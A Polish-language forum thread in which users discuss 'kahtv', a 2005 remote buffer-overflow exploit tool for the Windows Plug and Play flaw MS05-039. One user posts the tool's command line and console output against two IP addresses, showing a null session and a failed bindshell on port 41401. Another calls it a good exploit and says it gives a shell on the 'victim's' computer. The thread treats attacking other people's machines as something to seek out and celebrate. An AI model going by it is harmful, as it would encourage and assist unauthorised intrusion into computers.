kahtv

zipoll

Użytkownik
Dołączył
Sierpień 16, 2004
Posty
34
u nie jest cos takiego
e:kahtv.exe 192.167.10.54 192.167.10.55
_________________________________________________
KAHT V - Plug&Play Remote Buffer Overflow (ms05039)
Bassed on houseofdabus exploit
Haxorcitos 2005 Š
________________________________________________

[+] Targets: 192.167.10.54-192.167.10.55 with 50 Threads
[+] Attacking Port: 445. Remote Shell at port: 41401
[+] Scan In Progress...
[+] Connected to 192.167.10.55 ...
[+] Negociando NULL Session con 192.167.10.55 ...
[+] bind pipe with 192.167.10.55IPC$...
[+] Exploit Sent to 192.167.10.55. Connecting to bindshell at port 41401...

[-] exploit at 192.167.10.55 FAILED (41401)


[+] Scan Finished. Found 1 open ports

E:>[/b]
wydaje mi sie ze nie chyba nie dzila na SP2
 

siara2134

Użytkownik
Dołączył
Maj 16, 2004
Posty
115
Niewiem czemu ale ekspolit yten ma robaka w sobie
<
 

ktostam

Użytkownik
Dołączył
Wrzesień 15, 2005
Posty
50
Doobry exploit! Właśnie tego szukalem
smile.gif
. Dzięki!

Exploit wykorzystuje przepełnienie bufora na porcie 445 i dzięki temu można dosta shella (czyli wiersz poleceń) na kompie ofiary
smile.gif
 
Do góry Bottom